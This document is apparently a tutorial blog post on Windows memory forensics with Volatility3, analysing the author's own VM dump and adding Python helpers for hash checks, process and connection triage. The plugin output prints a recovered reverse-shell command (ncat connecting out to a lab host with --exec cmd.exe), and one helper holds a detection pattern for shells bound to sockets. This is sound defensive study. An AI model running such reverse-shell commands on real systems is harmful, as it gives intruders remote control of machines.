In this post, I'm taking a quick look at Volatility3, to understand its capabilities.
First up, obtaining Volatility3 via GitHub.
┌──(securitynik㉿securitynik)-[~]
└─$ git clone https://github.com/volatilityfoundation/volatility3.git
Next up, get an image. For this, I will take a memory dump of my own virtual machine, using the Comae Toolkit's DumpIt.exe.
C:\TMP
λ y:\Comae-Toolkit-Light-3.0.20180307.1\x64\DumpIt.exe
  DumpIt 3.0.20180307.1
  Copyright (C) 2007 - 2017, Matthieu Suiche <http://www.msuiche.net>
  Copyright (C) 2012 - 2014, MoonSols Limited <http://www.moonsols.com>
  Copyright (C) 2015 - 2017, Comae Technologies FZE <http://www.comae.io>

    Destination path:           \??\C:\TMP\SECURITYNIK-WIN-20220225-182235.dmp
    Computer name:              SECURITYNIK-WIN

    --> Proceed with the acquisition ? [y/n] y

    [+] Information:
    Dump Type:                  Microsoft Crash Dump

    [+] Machine Information:
    Windows version:            10.0.19044
    MachineId:                  88688394-D237-438C-92E3-06D84FF93CE9
    TimeStamp:                  132902869567075443
    Cr3:                        0x1aa000
    KdCopyDataBlock:            0xfffff8054df0e2e8
    KdDebuggerData:             0xfffff8054e603b20
    KdpDataBlockEncoded:        0xfffff8054e653b28
    Current date/time:          [2022-02-25 (YYYY-MM-DD) 18:22:36 (UTC)]
    + Processing... Done.
    Acquisition finished at:    [2022-02-25 (YYYY-MM-DD) 18:22:50 (UTC)]
    Time elapsed:               0:14 minutes:seconds (14 secs)
    Created file size:          2147020800 bytes (2047 Mb)
    Total physical memory size: 2047 Mb
    NtStatus (troubleshooting): 0x00000000
    Total of written pages:     524173
    Total of inacessible pages: 0
    Total of accessible pages:  524173
    SHA-256:                    A943219879526515F889BA2707699391132EC648E9C3B1B34C45A50DAB0BA6A3
    JSON path:                  C:\TMP\SECURITYNIK-WIN-20220225-182235.json
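As an added example (not from the post and not part of DumpIt or Volatility), this is the check I would run before any analysis: recompute the image's SHA-256 and byte count and compare them with what DumpIt printed, so the evidence analysed is the evidence that was acquired. Function names are mine, and demo() uses a tiny constructed stand-in file rather than a real dump; against the real image you would pass the SHA-256 and "Created file size" values from the acquisition output above.

```python
import hashlib
import tempfile
from pathlib import Path


def sha256_of_file(path, chunk_size=1 << 20):
    """Stream the file through SHA-256 in chunk_size pieces, so a multi-GB dump never
    has to fit in RAM. Returns the lowercase hex digest."""
    digest = hashlib.sha256()
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(chunk_size), b""):
            digest.update(chunk)
    return digest.hexdigest()


def verify_dump(dump_path, expected_sha256, expected_size=None, chunk_size=1 << 20):
    """Compare the image on disk with what the acquisition tool reported.
    expected_sha256 is accepted in either case (DumpIt prints it upper-case);
    expected_size is the 'Created file size' in bytes, if it was recorded."""
    dump_path = Path(dump_path)
    actual_size = dump_path.stat().st_size
    actual_hash = sha256_of_file(dump_path, chunk_size)
    return {
        "path": str(dump_path),
        "actual_size": actual_size,
        "actual_sha256": actual_hash,
        "size_ok": expected_size is None or actual_size == expected_size,
        "hash_ok": actual_hash == expected_sha256.strip().lower(),
    }


# Known-answer value: SHA-256 of the three bytes b"abc" (the FIPS 180 test vector).
SHA256_ABC = "ba7816bf8f01cfea414140de5dae2223b00361a396177a9cb410ff61f20015ad"


def demo():
    """Write a constructed 3-byte stand-in for a memory image, then verify it once with
    the correct hash (deliberately using a 2-byte chunk so the loop crosses a chunk
    boundary) and once against a tampered expectation. Returns both result dicts."""
    with tempfile.TemporaryDirectory() as tmp:
        fake_dump = Path(tmp) / "CONSTRUCTED-SAMPLE.dmp"   # constructed, not a real dump
        fake_dump.write_bytes(b"abc")
        good = verify_dump(fake_dump, SHA256_ABC.upper(), expected_size=3, chunk_size=2)
        bad = verify_dump(fake_dump, "00" * 32, expected_size=3, chunk_size=2)
    return good, bad


if __name__ == "__main__":
    for result in demo():
        print(result)
```

Record the result next to the dump together with the DumpIt JSON; a later re-verification that fails tells you the image changed after acquisition, which is the one thing no amount of plugin output can reveal.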
Now that I have the memory image, the first step is to get some help on how to use the tool.
Set up a symbolic link for volatility3:
┌──(securitynik㉿securitynik)-[~/mem_samples]
└─$ sudo ln --symbolic ~/volatility3/vol.py /usr/bin/vol3
Getting some help!
┌──(securitynik㉿securitynik)-[~/mem_samples]
└─$ vol3 --help | more
Volatility 3 Framework 2.0.2
usage: volatility [-h] [-c CONFIG] [--parallelism [{processes,threads,off}]]
                  [-e EXTEND] [-p PLUGIN_DIRS] [-s SYMBOL_DIRS] [-v] [-l LOG]
                  [-o OUTPUT_DIR] [-q] [-r RENDERER] [-f FILE] [--write-config]
                  [--clear-cache] [--cache-path CACHE_PATH] [--offline]
                  [--single-location SINGLE_LOCATION] [--stackers [STACKERS ...]]
                  [--single-swap-locations [SINGLE_SWAP_LOCATIONS ...]]
                  plugin ...

An open-source memory forensics framework
....
┌──(securitynik㉿securitynik)-[~/mem_samples]
└─$ vol3 --file SECURITYNIK-WIN-20220225-182235.dmp windows.info.Info
Volatility 3 Framework 2.0.2
Progress:  100.00  PDB scanning finished
Variable                         Value
Kernel Base                      0xf8054da03000
DTB                              0x1aa000
Symbols                          file:///home/securitynik/volatility3/volatility3/symbols/windows/ntkrnlmp.pdb/3177D31000BA7590DED335936C93E374-1.json.xz
Is64Bit                          True
IsPAE                            False
layer_name                       0 WindowsIntel32e
memory_layer                     1 WindowsCrashDump64Layer
base_layer                       2 FileLayer
KdVersionBlock                   0xf8054e612378
Major/Minor                      15.19041
MachineType                      34404
KeNumberProcessors               1
SystemTime                       2022-02-25 18:22:36
NtSystemRoot                     C:\Windows
NtProductType                    NtProductWinNt
NtMajorVersion                   10
NtMinorVersion                   0
PE MajorOperatingSystemVersion   10
PE MinorOperatingSystemVersion   0
PE Machine                       34404
PE TimeDateStamp                 Mon Jan 22 06:20:17 2103
┌──(securitynik㉿securitynik)-[~/mem_samples]
└─$ vol3 --file SECURITYNIK-WIN-20220225-182235.dmp windows.pslist.PsList
Volatility 3 Framework 2.0.2
Progress:  100.00  PDB scanning finished
PID  PPID  ImageFileName  Offset(V)  Threads  Handles  SessionId  Wow64  CreateTime  ExitTime  File output
4  0  System  0xd187b9684040  111  -  N/A  False  2022-02-25 18:20:37.000000  N/A  Disabled
72  4  Registry  0xd187b9754040  4  -  N/A  False  2022-02-25 18:20:35.000000  N/A  Disabled
352  4  smss.exe  0xd187bcf02080  3  -  N/A  False  2022-02-25 18:20:37.000000  N/A  Disabled
444  432  csrss.exe  0xd187c01ea140  11  -  0  False  2022-02-25 18:20:39.000000  N/A  Disabled
512  432  wininit.exe  0xd187be054080  5  -  0  False  2022-02-25 18:20:39.000000  N/A  Disabled
520  504  csrss.exe  0xd187be053140  11  -  1  False  2022-02-25 18:20:39.000000  N/A  Disabled
580  504  winlogon.exe  0xd187be090080  6  -  1  False  2022-02-25 18:20:39.000000  N/A  Disabled
604  512  services.exe  0xd187be097080  10  -  0  False  2022-02-25 18:20:39.000000  N/A  Disabled
612  512  lsass.exe  0xd187be09d080  8  -  0  False  2022-02-25 18:20:39.000000  N/A  Disabled
...
4492  4756  ncat.exe  0xd187c11a5080  5  -  1  False  2022-02-25 18:22:18.000000  N/A  Disabled
4260  4492  ncat.exe  0xd187c1af3080  3  -  1  True  2022-02-25 18:22:18.000000  N/A  Disabled
4500  4260  cmd.exe  0xd187c1bc6080  2  -  1  True  2022-02-25 18:22:18.000000  N/A  Disabled
4584  3960  DumpIt.exe  0xd187c1f81080  6  -  1  False  2022-02-25 18:22:35.000000  N/A  Disabled
4636  748  WmiPrvSE.exe  0xd187c1e430c0  11  -  0  False  2022-02-25 18:22:36.000000  N/A  Disabled
┌──(securitynik㉿securitynik)-[~/mem_samples]
└─$ vol3 --file SECURITYNIK-WIN-20220225-182235.dmp windows.psscan.PsScan
Volatility 3 Framework 2.0.2
Progress:  100.00  PDB scanning finished
PID  PPID  ImageFileName  Offset(V)  Threads  Handles  SessionId  Wow64  CreateTime  ExitTime  File output
4  0  System  0xd187b9684040  111  -  N/A  False  2022-02-25 18:20:37.000000  N/A  Disabled
72  4  Registry  0xd187b9754040  4  -  N/A  False  2022-02-25 18:20:35.000000  N/A  Disabled
352  4  smss.exe  0xd187bcf02080  3  -  N/A  False  2022-02-25 18:20:37.000000  N/A  Disabled
520  504  csrss.exe  0xd187be053140  11  -  1  False  2022-02-25 18:20:39.000000  N/A  Disabled
512  432  wininit.exe  0xd187be054080  5  -  0  False  2022-02-25 18:20:39.000000  N/A  Disabled
580  504  winlogon.exe  0xd187be090080  6  -  1  False  2022-02-25 18:20:39.000000  N/A  Disabled
604  512  services.exe  0xd187be097080  10  -  0  False  2022-02-25 18:20:39.000000  N/A  Disabled
612  512  lsass.exe  0xd187be09d080  8  -  0  False  2022-02-25 18:20:39.000000  N/A  Disabled
...
4492  4756  ncat.exe  0xd187c11a5080  5  -  1  False  2022-02-25 18:22:18.000000  N/A  Disabled
...
3960  3304  cmd.exe  0xd187c1aed080  3  -  1  False  2022-02-25 18:21:10.000000  N/A  Disabled
4260  4492  ncat.exe  0xd187c1af3080  3  -  1  True  2022-02-25 18:22:18.000000  N/A  Disabled
...
4500  4260  cmd.exe  0xd187c1bc6080  2  -  1  True  2022-02-25 18:22:18.000000  N/A  Disabled
4756  4696  cmd.exe  0xd187c1cef080  4  -  1  False  2022-02-25 18:21:55.000000  N/A  Disabled
...
4584  3960  DumpIt.exe  0xd187c1f81080  6  -  1  False  2022-02-25 18:22:35.000000  N/A  Disabled
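Added example, not the post's own code: a small parser for the PsList/PsScan text output above that (a) reports what the pool scanner sees but the linked process list does not, which is how exited processes still in memory and processes unlinked by a rootkit show up, and (b) renders the parent/child chain leading to the ncat.exe and cmd.exe processes. The rows are copied from the two listings above (3960 and 4756 come from the PsScan output, where the PsList listing elides them); PID 4100 (whoami.exe with an ExitTime) is an invented row standing in for an exited process and is not from the post. Function names are my assumptions.

```python
from collections import defaultdict

# Constructed sample: a subset of the PsList rows shown above.
PSLIST_OUTPUT = """Volatility 3 Framework 2.0.2
Progress:  100.00  PDB scanning finished
PID  PPID  ImageFileName  Offset(V)  Threads  Handles  SessionId  Wow64  CreateTime  ExitTime  File output
4  0  System  0xd187b9684040  111  -  N/A  False  2022-02-25 18:20:37.000000  N/A  Disabled
352  4  smss.exe  0xd187bcf02080  3  -  N/A  False  2022-02-25 18:20:37.000000  N/A  Disabled
3960  3304  cmd.exe  0xd187c1aed080  3  -  1  False  2022-02-25 18:21:10.000000  N/A  Disabled
4756  4696  cmd.exe  0xd187c1cef080  4  -  1  False  2022-02-25 18:21:55.000000  N/A  Disabled
4492  4756  ncat.exe  0xd187c11a5080  5  -  1  False  2022-02-25 18:22:18.000000  N/A  Disabled
4260  4492  ncat.exe  0xd187c1af3080  3  -  1  True  2022-02-25 18:22:18.000000  N/A  Disabled
4500  4260  cmd.exe  0xd187c1bc6080  2  -  1  True  2022-02-25 18:22:18.000000  N/A  Disabled
4584  3960  DumpIt.exe  0xd187c1f81080  6  -  1  False  2022-02-25 18:22:35.000000  N/A  Disabled
"""

# Constructed sample: the same rows as PsScan reports them, plus one invented row
# (PID 4100, whoami.exe, ExitTime set) standing in for a process that had already
# exited but whose _EPROCESS was still in the pool. That row is not from the post.
PSSCAN_OUTPUT = PSLIST_OUTPUT + """4100  4756  whoami.exe  0xd187c1d00080  0  -  1  False  2022-02-25 18:21:57.000000  2022-02-25 18:21:58.000000  Disabled
"""


def parse_process_rows(text):
    """Parse PsList/PsScan text into a dict keyed by PID. Only data rows (leading
    integer PID) are kept; banner and header lines are skipped. Keying by PID is
    fine for one snapshot; across reused PIDs you would key by Offset(V) instead."""
    rows = {}
    for line in text.splitlines():
        parts = line.split()
        if len(parts) < 11 or not parts[0].isdigit():
            continue
        # CreateTime is "YYYY-MM-DD HH:MM:SS.ffffff" (two tokens);
        # ExitTime is either "N/A" or another two-token timestamp.
        exit_time = "N/A" if parts[10] == "N/A" else " ".join(parts[10:12])
        rows[int(parts[0])] = {
            "pid": int(parts[0]), "ppid": int(parts[1]), "name": parts[2],
            "offset": parts[3], "wow64": parts[7] == "True",
            "create": " ".join(parts[8:10]), "exit": exit_time,
        }
    return rows


def compare_pslist_psscan(pslist_text, psscan_text):
    """Processes the pool scanner (psscan) sees but the linked list (pslist) does not.
    Each is either a terminated process whose _EPROCESS is still in memory, or a live
    process unlinked from the active-process list, which is how a rootkit hides one."""
    listed = parse_process_rows(pslist_text)
    scanned = parse_process_rows(psscan_text)
    findings = []
    for pid, row in scanned.items():
        if pid in listed:
            continue
        reason = "terminated (ExitTime set)" if row["exit"] != "N/A" else "unlinked from the active-process list"
        findings.append((pid, row["name"], reason))
    return sorted(findings)


def process_tree(rows, root_pid):
    """Render the parent/child chain under root_pid as indented 'name (pid)' lines."""
    children = defaultdict(list)
    for row in rows.values():
        children[row["ppid"]].append(row)
    lines = []

    def walk(pid, depth):
        row = rows[pid]
        tag = " [wow64]" if row["wow64"] else ""
        lines.append(f"{'  ' * depth}{row['name']} ({pid}){tag}")
        for child in sorted(children[pid], key=lambda r: r["pid"]):
            walk(child["pid"], depth + 1)

    walk(root_pid, 0)
    return lines


if __name__ == "__main__":
    for finding in compare_pslist_psscan(PSLIST_OUTPUT, PSSCAN_OUTPUT):
        print("psscan-only:", finding)
    print("\n".join(process_tree(parse_process_rows(PSLIST_OUTPUT), 4756)))
```

The tree makes the chain visible at a glance: cmd.exe (4756) launched ncat.exe (4492), which launched the 32-bit ncat.exe (4260), which in turn spawned cmd.exe (4500); the netstat and cmdline output further down shows why that last hop matters.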
┌──(securitynik㉿securitynik)-[~/mem_samples]
└─$ vol3 --file SECURITYNIK-WIN-20220225-182235.dmp windows.netstat.NetStat
Volatility 3 Framework 2.0.2
Progress:  100.00  PDB scanning finished
Offset  Proto  LocalAddr  LocalPort  ForeignAddr  ForeignPort  State  PID  Owner  Created
0xd187bff9e730  TCPv4  10.0.0.102  49671  10.0.0.110  9999  ESTABLISHED  4260  ncat.exe  2022-02-25 18:22:18.000000
....
┌──(securitynik㉿securitynik)-[~/mem_samples]
└─$ vol3 --file SECURITYNIK-WIN-20220225-182235.dmp windows.netscan.NetScan
Volatility 3 Framework 2.0.2
Progress:  100.00  PDB scanning finished
Offset  Proto  LocalAddr  LocalPort  ForeignAddr  ForeignPort  State  PID  Owner  Created
0xd187b9697b50  TCPv4  0.0.0.0  5357  0.0.0.0  0  LISTENING  4  System  2022-02-25 18:20:41.000000
0xd187b9697b50  TCPv6  ::  5357  ::  0  LISTENING  4  System  2022-02-25 18:20:41.000000
0xd187b9697cb0  TCPv4  0.0.0.0  49668  0.0.0.0  0  LISTENING  1832  spoolsv.exe  2022-02-25 18:20:43.000000
0xd187bc7a0050  TCPv4  10.0.0.102  139  0.0.0.0  0  LISTENING  4  System  2022-02-25 18:20:40.000000
0xd187bc7a01b0  TCPv4  0.0.0.0  49668  0.0.0.0  0  LISTENING  1832  spoolsv.exe  2022-02-25 18:20:43.000000
0xd187bc7a01b0  TCPv6  ::  49668  ::  0  LISTENING  1832  spoolsv.exe  2022-02-25 18:20:43.000000
...
0xd187c1e3c4b0  UDPv4  127.0.0.1  1900  *  0    1560  svchost.exe  2022-02-25 18:22:35.000000
0xd187c1e3d2c0  UDPv6  ::1  1900  *  0    1560  svchost.exe  2022-02-25 18:22:35.000000
┌──(securitynik㉿securitynik)-[~/mem_samples]
└─$ vol3 --file SECURITYNIK-WIN-20220225-182235.dmp windows.pslist.PsList --pid 4260
Volatility 3 Framework 2.0.2
Progress:  100.00  PDB scanning finished
PID  PPID  ImageFileName  Offset(V)  Threads  Handles  SessionId  Wow64  CreateTime  ExitTime  File output
4260  4492  ncat.exe  0xd187c1af3080  3  -  1  True  2022-02-25 18:22:18.000000  N/A  Disabled
┌──(securitynik㉿securitynik)-[~/mem_samples]
└─$ vol3 --file SECURITYNIK-WIN-20220225-182235.dmp windows.pslist.PsList | grep 4260
4260  4492  ncat.exe  0xd187c1af3080  3  -  1  True  2022-02-25 18:22:18.000000  N/A  Disabled
4500  4260  cmd.exe  0xd187c1bc6080  2  -  1  True  2022-02-25 18:22:18.000000  N/A  Disabled
┌──(securitynik㉿securitynik)-[~/mem_samples]
└─$ vol3 --file SECURITYNIK-WIN-20220225-182235.dmp windows.cmdline.CmdLine --pid 4260
Volatility 3 Framework 2.0.2
Progress:  100.00  PDB scanning finished
PID  Process  Args
4260  ncat.exe  "C:\ProgramData\chocolatey\lib\ncat.flare\tools\ncat-portable-5.59BETA1\ncat.exe" --verbose 10.0.0.110 9999 --exec cmd.exe
┌──(securitynik㉿securitynik)-[~/mem_samples]
└─$ vol3 --file SECURITYNIK-WIN-20220225-182235.dmp windows.cmdline.CmdLine --pid 4500
Volatility 3 Framework 2.0.2
Progress:  100.00  PDB scanning finished
PID  Process  Args
4500  cmd.exe  cmd.exe
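Added example (mine, not from the post): joining the NetScan/NetStat rows to the CmdLine rows by PID, so that each established connection is read together with the command line that owns it. It also handles the column shift on UDP rows, which carry no State value in the output above. The flagged pattern, an exec-style switch handing a shell interpreter to the socket, is exactly what the PID 4260 command line shows. The sample rows are copied from the outputs above; the regex, the record layout and the function names are my assumptions.

```python
import re

# Constructed sample: rows copied from the NetScan output above (UDP rows have an empty State).
NETSCAN_OUTPUT = """Volatility 3 Framework 2.0.2
Progress:  100.00  PDB scanning finished
Offset  Proto  LocalAddr  LocalPort  ForeignAddr  ForeignPort  State  PID  Owner  Created
0xd187b9697b50  TCPv4  0.0.0.0  5357  0.0.0.0  0  LISTENING  4  System  2022-02-25 18:20:41.000000
0xd187bc7a0050  TCPv4  10.0.0.102  139  0.0.0.0  0  LISTENING  4  System  2022-02-25 18:20:40.000000
0xd187bff9e730  TCPv4  10.0.0.102  49671  10.0.0.110  9999  ESTABLISHED  4260  ncat.exe  2022-02-25 18:22:18.000000
0xd187c1e3c4b0  UDPv4  127.0.0.1  1900  *  0    1560  svchost.exe  2022-02-25 18:22:35.000000
"""

# Constructed sample: the two CmdLine rows shown above.
CMDLINE_OUTPUT = r"""Volatility 3 Framework 2.0.2
Progress:  100.00  PDB scanning finished
PID  Process  Args
4260  ncat.exe  "C:\ProgramData\chocolatey\lib\ncat.flare\tools\ncat-portable-5.59BETA1\ncat.exe" --verbose 10.0.0.110 9999 --exec cmd.exe
4500  cmd.exe  cmd.exe
"""

# An exec-style switch followed by a shell interpreter: the socket is wired to a shell.
SHELL_RE = re.compile(
    r"(?:^|\s)(?:-e|--exec|--sh-exec)\s+\S*?(cmd\.exe|powershell\.exe|pwsh\.exe|/bin/(?:ba)?sh)\b",
    re.IGNORECASE,
)


def parse_connections(text):
    """Parse NetScan/NetStat rows. Data rows start with a 0x offset; UDP sockets have
    no State, so every column after ForeignPort shifts left by one on those rows."""
    conns = []
    for line in text.splitlines():
        parts = line.split()
        if len(parts) < 10 or not parts[0].startswith("0x"):
            continue
        offset, proto, laddr, lport, faddr, fport = parts[:6]
        if proto.upper().startswith("UDP"):
            state, rest = "", parts[6:]
        else:
            state, rest = parts[6], parts[7:]
        conns.append({
            "offset": offset, "proto": proto, "laddr": laddr, "lport": int(lport),
            "faddr": faddr, "fport": int(fport), "state": state,
            "pid": int(rest[0]) if rest[0].isdigit() else None,
            "owner": rest[1],
            "created": " ".join(rest[2:4]) if len(rest) >= 4 else "N/A",
        })
    return conns


def parse_cmdlines(text):
    """Map PID -> full argument string from CmdLine output (Args may contain spaces)."""
    cmds = {}
    for line in text.splitlines():
        parts = line.split(maxsplit=2)
        if len(parts) < 2 or not parts[0].isdigit():
            continue
        cmds[int(parts[0])] = parts[2] if len(parts) == 3 else ""
    return cmds


def triage_connections(netscan_text, cmdline_text):
    """One record per ESTABLISHED TCP connection, joined to the owner's command line,
    flagged when that command line hands a shell interpreter to the socket."""
    cmds = parse_cmdlines(cmdline_text)
    findings = []
    for c in parse_connections(netscan_text):
        if c["state"] != "ESTABLISHED" or c["pid"] is None:
            continue
        args = cmds.get(c["pid"], "")
        m = SHELL_RE.search(args)
        findings.append({
            "pid": c["pid"], "owner": c["owner"],
            "remote": f'{c["faddr"]}:{c["fport"]}', "created": c["created"],
            "args": args, "suspicious": bool(m),
            "reason": f"command line hands {m.group(1)} to the socket" if m else "",
        })
    return findings


if __name__ == "__main__":
    for f in triage_connections(NETSCAN_OUTPUT, CMDLINE_OUTPUT):
        print(f)
```

A quieter variant of the same idea flags any ESTABLISHED connection whose owner has a cmd.exe or powershell.exe child in PsList, which catches the case where the shell is started by a second stage rather than named on the command line.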
┌──(securitynik㉿securitynik)-[~/mem_samples]
└─$ vol3 --file SECURITYNIK-WIN-20220225-182235.dmp windows.dlllist.DllList --pid 4260
Volatility 3 Framework 2.0.2
Progress:  100.00  PDB scanning finished
PID  Process  Base  Size  Name  Path  LoadTime  File output
4260  ncat.exe  0x730000  0x1a1000  ncat.exe  C:\ProgramData\chocolatey\lib\ncat.flare\tools\ncat-portable-5.59BETA1\ncat.exe  2022-02-25 18:22:18.000000  Disabled
4260  ncat.exe  0x7ffe2ab70000  0x1f5000  ntdll.dll  C:\Windows\SYSTEM32\ntdll.dll  2022-02-25 18:22:18.000000  Disabled
4260  ncat.exe  0x7ffe2a810000  0x59000  wow64.dll  C:\Windows\System32\wow64.dll  2022-02-25 18:22:18.000000  Disabled
4260  ncat.exe  0x7ffe29950000  0x83000  wow64win.dll  C:\Windows\System32\wow64win.dll  2022-02-25 18:22:18.000000  Disabled
4260  ncat.exe  0x771d0000  0xa000  wow64cpu.dll  C:\Windows\System32\wow64cpu.dll  2022-02-25 18:22:18.000000  Disabled
┌──(securitynik㉿securitynik)-[~/mem_samples]
└─$ vol3 --file SECURITYNIK-WIN-20220225-182235.dmp windows.dlllist.DllList --pid 4500
Volatility 3 Framework 2.0.2
Progress:  100.00  PDB scanning finished
PID  Process  Base  Size  Name  Path  LoadTime  File output
4500  cmd.exe  0x1000000  0x5a000  cmd.exe  C:\Windows\SysWOW64\cmd.exe  2022-02-25 18:22:18.000000  Disabled
4500  cmd.exe  0x7ffe2ab70000  0x1f5000  ntdll.dll  C:\Windows\SYSTEM32\ntdll.dll  2022-02-25 18:22:18.000000  Disabled
4500  cmd.exe  0x7ffe2a810000  0x59000  wow64.dll  C:\Windows\System32\wow64.dll  2022-02-25 18:22:18.000000  Disabled
4500  cmd.exe  0x7ffe29950000  0x83000  wow64win.dll  C:\Windows\System32\wow64win.dll  2022-02-25 18:22:18.000000  Disabled
4500  cmd.exe  0x771d0000  0xa000  wow64cpu.dll  C:\Windows\System32\wow64cpu.dll  2022-02-25 18:22:18.000000  Disabled
┌──(securitynik㉿securitynik)-[~/mem_samples] └─$ vol3 --file SECURITYNIK-WIN-20220225-182235.dmp windows.ldrmodules.LdrModules --pid 4260 Volatility 3 Framework 2.0.2 Progress: 100.00 PDB scanning finished Pid Process Base InLoad InInit InMem MappedPath 4260 ncat.exe 0x75c20000 False False False \Windows\SysWOW64\KernelBase.dll 4260 ncat.exe 0x730000 True False True \ProgramData\chocolatey\lib\ncat.flare\tools\ncat-portable-5.59BETA1\ncat.exe 4260 ncat.exe 0x1400000 False False False \Windows\SysWOW64\winnlsres.dll 4260 ncat.exe 0x1410000 False False False \Windows\System32\en-US\winnlsres.dll.mui 4260 ncat.exe 0x73a70000 False False False \Windows\SysWOW64\apphelp.dll 4260 ncat.exe 0x10000000 False False False \Windows\SysWOW64\pcapwsp.dll 4260 ncat.exe 0x75180000 False False False \Windows\SysWOW64\kernel32.dll 4260 ncat.exe 0x745e0000 False False False \Windows\SysWOW64\cryptsp.dll 4260 ncat.exe 0x74500000 False False False \Windows\SysWOW64\mswsock.dll 4260 ncat.exe 0x73b20000 False False False \Windows\SysWOW64\cryptbase.dll 4260 ncat.exe 0x74560000 False False False \Windows\SysWOW64\rsaenh.dll 4260 ncat.exe 0x750a0000 False False False \Windows\SysWOW64\gdi32full.dll 4260 ncat.exe 0x747b0000 False False False \Windows\SysWOW64\version.dll 4260 ncat.exe 0x759d0000 False False False \Windows\SysWOW64\gdi32.dll 4260 ncat.exe 0x75830000 False False False \Windows\SysWOW64\user32.dll 4260 ncat.exe 0x75b60000 False False False \Windows\SysWOW64\msvcrt.dll 4260 ncat.exe 0x771e0000 False False False \Windows\SysWOW64\ntdll.dll 4260 ncat.exe 0x763e0000 False False False \Windows\SysWOW64\advapi32.dll 4260 ncat.exe 0x75ee0000 False False False \Windows\SysWOW64\msvcp_win.dll 4260 ncat.exe 0x75e60000 False False False \Windows\SysWOW64\sechost.dll 4260 ncat.exe 0x75e40000 False False False \Windows\SysWOW64\bcrypt.dll 4260 ncat.exe 0x762a0000 False False False \Windows\SysWOW64\imm32.dll 4260 ncat.exe 0x762d0000 False False False \Windows\SysWOW64\bcryptprimitives.dll 
4260 ncat.exe 0x766e0000 False False False \Windows\SysWOW64\rpcrt4.dll 4260 ncat.exe 0x766c0000 False False False \Windows\SysWOW64\win32u.dll 4260 ncat.exe 0x76460000 False False False \Windows\SysWOW64\ucrtbase.dll 4260 ncat.exe 0x76cf0000 False False False \Windows\SysWOW64\ws2_32.dll 4260 ncat.exe 0x771d0000 True True True \Windows\System32\wow64cpu.dll 4260 ncat.exe 0x7e110000 False False False \Tools\Cmder\vendor\conemu-maximus5\ConEmu\ConEmuHk.dll 4260 ncat.exe 0x7ffe2a810000 True True True \Windows\System32\wow64.dll 4260 ncat.exe 0x7ffe29950000 True True True \Windows\System32\wow64win.dll 4260 ncat.exe 0x7ffe2ab70000 True True True \Windows\System32\ntdll.dll
Nothing seems out of the ordinary above. The long run of False/False/False entries for the SysWOW64 modules is expected for a 32-bit process (Wow64 is True for PID 4260): the loader lists the plugin walks here belong to the 64-bit PEB, which only tracks ntdll.dll and the wow64*.dll layer, while the 32-bit DLLs are mapped into the process but tracked by the 32-bit PEB. Dumping the files associated with ncat.exe:
┌──(securitynik㉿securitynik)-[~/mem_samples]
└─$ vol3 --file SECURITYNIK-WIN-20220225-182235.dmp windows.dumpfiles.DumpFiles --pid 4260
Volatility 3 Framework 2.0.2
Progress:  100.00  PDB scanning finished
Cache  FileObject  FileName  Result
ImageSectionObject  0xd187bfc10bb0  KernelBase.dll  file.0xd187bfc10bb0.0xd187bcf3a770.ImageSectionObject.KernelBase.dll.img
DataSectionObject  0xd187c14add70  ncat.exe  Error dumping file
ImageSectionObject  0xd187c14add70  ncat.exe  file.0xd187c14add70.0xd187b96c9a20.ImageSectionObject.ncat.exe.img
...
┌──(securitynik㉿securitynik)-[~/mem_samples]
└─$ ls | grep ncat
file.0xd187c14add70.0xd187b96c9a20.ImageSectionObject.ncat.exe.img
file.0xd187c14add70.0xd187c1fc7c10.DataSectionObject.ncat.exe.dat
...
Using the file command to identify the two files dumped above:
┌──(securitynik㉿securitynik)-[~/mem_samples]
└─$ file file.0xd187c14add70.0xd187b96c9a20.ImageSectionObject.ncat.exe.img \
> file.0xd187c14add70.0xd187c1fc7c10.DataSectionObject.ncat.exe.dat
file.0xd187c14add70.0xd187b96c9a20.ImageSectionObject.ncat.exe.img: PE32 executable (console) Intel 80386, for MS Windows
file.0xd187c14add70.0xd187c1fc7c10.DataSectionObject.ncat.exe.dat: PE32 executable (console) Intel 80386, for MS Windows
┌──(securitynik㉿securitynik)-[~/mem_samples]
└─$ vol3 --file SECURITYNIK-WIN-20220225-182235.dmp windows.filescan.FileScan | grep -i ncat
0xd187c14add70.0\ProgramData\chocolatey\lib\ncat.flare\tools\ncat-portable-5.59BETA1\ncat.exe  216
0xd187c1e11be0  \ProgramData\chocolatey\bin\ncat.exe  216
0xd187c1e279e0  \Windows\Prefetch\NCAT.EXE-4B4B887F.pf  216
0xd187c1e2a280  \ProgramData\chocolatey\bin\ncat.exe  216
0xd187c1e32750  \Windows\Prefetch\NCAT.EXE-1B3976EF.pf  216
0xd187c1e34820  \ncat-0  216
0xd187c1e349b0  \ncat-0  216
We see at least the path of the file, as well as a prefetch entry for it.
Looking at the MFTScan plugin.
┌──(securitynik㉿securitynik)-[~/mem_samples] └─$ vol3 --file SECURITYNIK-WIN-20220225-182235.dmp windows.mftscan.MFTScan | grep -i ncat * 0xbb0681ad38b00 FILE 104014an2ing finFiled Archive FILE_NAME 2022-02-05 20:57:48.000000 2022-02-05 20:57:48.000000 2022-02-05 20:57:48.000000 2022-02-05 20:57:48.000000 ncat.exe.log * 0xbb0681ad3928 FILE 104014 2 File Archive FILE_NAME 2022-02-05 20:57:48.000000 2022-02-05 20:57:48.000000 2022-02-05 20:57:48.000000 2022-02-05 20:57:48.000000 NCATEX~1.LOG ... * 0xbb0688e7c920 FILE 105970 2 File Archive FILE_NAME 2022-02-25 18:15:47.000000 2022-02-25 18:15:47.000000 2022-02-25 18:15:47.000000 2022-02-25 18:15:47.000000 NCAT.EXE-1B3976EF.pf * 0xbb0688e7d8b0 FILE 105974 2 File Archive FILE_NAME 2022-02-25 18:15:47.000000 2022-02-25 18:15:47.000000 2022-02-25 18:15:47.000000 2022-02-25 18:15:47.000000 NCATEX~2.PF * 0xbb0688e7d920 FILE 105974 2 File Archive FILE_NAME 2022-02-25 18:15:47.000000 2022-02-25 18:15:47.000000 2022-02-25 18:15:47.000000 2022-02-25 18:15:47.000000 NCAT.EXE-4B4B887F.pf
Looking at the environment variables for the ncat.exe process with PID 4260
┌──(securitynik㉿securitynik)-[~/mem_samples]
└─$ vol3 --file SECURITYNIK-WIN-20220225-182235.dmp windows.envars.Envars --pid 4260
Volatility 3 Framework 2.0.2
Progress:  100.00  PDB scanning finished
PID  Process  Block  Variable  Value
...
4260  ncat.exe  0x14a4810  LOCALAPPDATA  C:\Users\SecurityNik\AppData\Local
...
4260  ncat.exe  0x14a4810  OS  Windows_NT
...
4260  ncat.exe  0x14a4810  USERDOMAIN  SECURITYNIK-WIN
